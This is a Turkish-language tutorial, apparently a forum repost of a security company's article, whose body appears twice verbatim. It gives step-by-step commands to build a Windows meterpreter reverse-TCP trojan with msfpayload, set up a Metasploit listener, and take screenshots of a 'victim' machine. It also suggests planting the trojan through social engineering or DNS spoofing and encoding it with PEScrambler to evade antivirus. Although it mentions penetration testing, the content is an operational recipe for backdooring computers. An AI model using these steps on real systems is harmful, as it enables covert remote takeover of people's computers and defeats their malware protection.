Penetrasyon testlerinde, sistemlerin ve kullanıcıların zafiyetlerinden yararlanarak trojan-backdoor kullanılabilmektedir. Bu makalede bazı antivirus programlarına yakalanmadan kali linux üzerinden backdoor payload oluşturarak kurban bilgisayarına nasıl sızılacağından bahsedeceğiz. Böylece kurban bilgisayarı üzerinde tam kontrol sağlanabilecektir.
****sploit Framework kullanarak bir arka kapı oluşturabiliriz. Hedef sistemi belirledikten sonra ****spolit Framework araçını kullanarak Windows(x32/x64) ve Linux işletim sistemi için çalıştırabilir bir dosya üreteceğiz.
Bizim örneğimizde Windows işletim sistemine reverse TCP bağlantısı için uygun bir çalıştırabilir dosya (.exe) üreteceğiz.
Trojan-Backdoor nedir?
Hedef bilgisayara yüklendikten sonra, başkaları tarafından kontrol edilmesini sağlayan kötü amaçlı programlardır. Bu saldırgana bilgisayar üzerinde bütün herşeyi yapma izni verebilmektedir.
Trojan-Backdoor nasıl üretilir?
Şimdi çalıştırabilir kodumuzu üretmede meterpreter reverse payload'u dahil ederek msfpaylaod kullanacağız. Meterpreter payload dosya bilgisi aşağıdaki gibidir. LHOST saldırganın IP adresi, LPORT saldırganın dinleme yapacağı port bilgisidir.
# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.2.17 LPORT=6666 x > ~/Desktop/trojan.exe
Created by msfpayload (http://www.****sploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: {"LHOST"=>"192.168.1.4", "LPORT"=>"6666"}
msfpayload ile trojen-backdoor nasıl yapılır- üretme - btrisk
Artık trojan hazır ve bunu kurban sistemine yerleştirilebilir. Bunu sosyal mühendislik yöntemlerini kullanarak, fiziksel olarak yükleyerek, DNS spoof ederek gideceği sayfaya belirlenen sayfadan trojani yükleyerek, vb. gerçekleştirilebilir.
Trojan sistemde çalışmaya başladıktan sonra dinleme moduna geçebiliriz.
****sploit konsoluna
msf > use exploit/multi/handler
Kullanacağımız payload'u ekleyelim.
paylaod set PAYLOAD windows/meterpreter/reverse_tcp
Bağlantı elde edebilmek için kendi IP adresimizi yazıyoruz.
set LHOST 192.168.2.17
Bağlantı yapmak istediğimiz Port değerini ekleyelim.
set LPORT 6666
"exploit " dedikten sonra dinleme moduna geçiyoruz. Hedef sistem de yüklenen dosyamız çalıştırıldıktan sonra Meterpreter session bilgisi aşağıdaki gibi bize dönecektir.
meterpreter ile trojen isteği dinleme - btrisk
Kurban bilgisayarından yakanılan ekran görüntüsü
meterpreter > screenshot
BTRisk Bilgi Güvenliği ve BT Yönetişim Hizmetleri
Trojan oluşturulan dosya genelde küçük boyutta ve bize dosya yüklemek için bir arka kapı sunmaktadır. Sistem bilgisayarından bu trojan/backdoor isteği geldikten(oturum yakalandıktan) sonra saldırgandan hedef sisteme daha büyük boyutlu bir dosya transfer edilmektedir. Aslında ilk yüklenen dosya ikinci(asıl backdoor) dosyanın yüklenmesini sağlamakta ve bu ikinci dosya ile saldırgan, hedef sistemi kontrol edebilmektedir.
Antivirus Tespit Etmeden Trojan Yapma
Oluşturulan trojan windows xp ve 7 de çalışabilir, eğer antivirus yoksa. Antivirus varsa veya windows 8 ve üzeri bir sürüm varsa, hedef sistemde kullanıcı uyarılabilir. Windows 8'de trojan belirlenebilir ve kullanıcıya çalıştırmasına izin vermeyen anti-malware koruması (Windows defender) engelleyebilir.
Bu yüzden saldırgan, trojan tespit edilmemesinin bir yolunu bulmalı. Antivirus/anti-malware programı tespit etmeden trojan yapmak için yararlı bir tool olan PEScrambler aracı kullanılabilir. Bu tool çalıştırabilir dosyayı encode eder. Aracı aşağıdaki linkten indirebilirsiniz.
https://code.google.com/p/pescrambler/
İndirdiğiniz dosyada çalıştırılabilir bir dosya bulunmaktadır.
C:\>PEScrambler.exe -i trojan.exe -o encoded.exe
Kodunu yazarak encode edilmiş ve trojan.exe dosyasından farklı antivirus programlarının tespit edemeceği yeni bir dosya oluşturur.
Bu işlemleri sonra hala bazı antivirus ve antimalware programları saldırganın ürettiği trojan dosyasını tespit edebilir. Özellikle Windows 8 de trojani tespit etmek için önleyici önlemler alınmıştır.
Kaynak
****sploit Framework kullanarak bir arka kapı oluşturabiliriz. Hedef sistemi belirledikten sonra ****spolit Framework araçını kullanarak Windows(x32/x64) ve Linux işletim sistemi için çalıştırabilir bir dosya üreteceğiz.
Bizim örneğimizde Windows işletim sistemine reverse TCP bağlantısı için uygun bir çalıştırabilir dosya (.exe) üreteceğiz.
Trojan-Backdoor nedir?
Hedef bilgisayara yüklendikten sonra, başkaları tarafından kontrol edilmesini sağlayan kötü amaçlı programlardır. Bu saldırgana bilgisayar üzerinde bütün herşeyi yapma izni verebilmektedir.
Trojan-Backdoor nasıl üretilir?
Şimdi çalıştırabilir kodumuzu üretmede meterpreter reverse payload'u dahil ederek msfpaylaod kullanacağız. Meterpreter payload dosya bilgisi aşağıdaki gibidir. LHOST saldırganın IP adresi, LPORT saldırganın dinleme yapacağı port bilgisidir.
# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.2.17 LPORT=6666 x > ~/Desktop/trojan.exe
Created by msfpayload (http://www.****sploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: {"LHOST"=>"192.168.1.4", "LPORT"=>"6666"}
msfpayload ile trojen-backdoor nasıl yapılır- üretme - btrisk
Artık trojan hazır ve bunu kurban sistemine yerleştirilebilir. Bunu sosyal mühendislik yöntemlerini kullanarak, fiziksel olarak yükleyerek, DNS spoof ederek gideceği sayfaya belirlenen sayfadan trojani yükleyerek, vb. gerçekleştirilebilir.
Trojan sistemde çalışmaya başladıktan sonra dinleme moduna geçebiliriz.
****sploit konsoluna
msf > use exploit/multi/handler
Kullanacağımız payload'u ekleyelim.
paylaod set PAYLOAD windows/meterpreter/reverse_tcp
Bağlantı elde edebilmek için kendi IP adresimizi yazıyoruz.
set LHOST 192.168.2.17
Bağlantı yapmak istediğimiz Port değerini ekleyelim.
set LPORT 6666
"exploit " dedikten sonra dinleme moduna geçiyoruz. Hedef sistem de yüklenen dosyamız çalıştırıldıktan sonra Meterpreter session bilgisi aşağıdaki gibi bize dönecektir.
meterpreter ile trojen isteği dinleme - btrisk
Kurban bilgisayarından yakanılan ekran görüntüsü
meterpreter > screenshot
BTRisk Bilgi Güvenliği ve BT Yönetişim Hizmetleri
Trojan oluşturulan dosya genelde küçük boyutta ve bize dosya yüklemek için bir arka kapı sunmaktadır. Sistem bilgisayarından bu trojan/backdoor isteği geldikten(oturum yakalandıktan) sonra saldırgandan hedef sisteme daha büyük boyutlu bir dosya transfer edilmektedir. Aslında ilk yüklenen dosya ikinci(asıl backdoor) dosyanın yüklenmesini sağlamakta ve bu ikinci dosya ile saldırgan, hedef sistemi kontrol edebilmektedir.
Antivirus Tespit Etmeden Trojan Yapma
Oluşturulan trojan windows xp ve 7 de çalışabilir, eğer antivirus yoksa. Antivirus varsa veya windows 8 ve üzeri bir sürüm varsa, hedef sistemde kullanıcı uyarılabilir. Windows 8'de trojan belirlenebilir ve kullanıcıya çalıştırmasına izin vermeyen anti-malware koruması (Windows defender) engelleyebilir.
Bu yüzden saldırgan, trojan tespit edilmemesinin bir yolunu bulmalı. Antivirus/anti-malware programı tespit etmeden trojan yapmak için yararlı bir tool olan PEScrambler aracı kullanılabilir. Bu tool çalıştırabilir dosyayı encode eder. Aracı aşağıdaki linkten indirebilirsiniz.
https://code.google.com/p/pescrambler/
İndirdiğiniz dosyada çalıştırılabilir bir dosya bulunmaktadır.
C:\>PEScrambler.exe -i trojan.exe -o encoded.exe
Kodunu yazarak encode edilmiş ve trojan.exe dosyasından farklı antivirus programlarının tespit edemeceği yeni bir dosya oluşturur.
Bu işlemleri sonra hala bazı antivirus ve antimalware programları saldırganın ürettiği trojan dosyasını tespit edebilir. Özellikle Windows 8 de trojani tespit etmek için önleyici önlemler alınmıştır.
Kaynak
Moderatör tarafında düzenlendi:
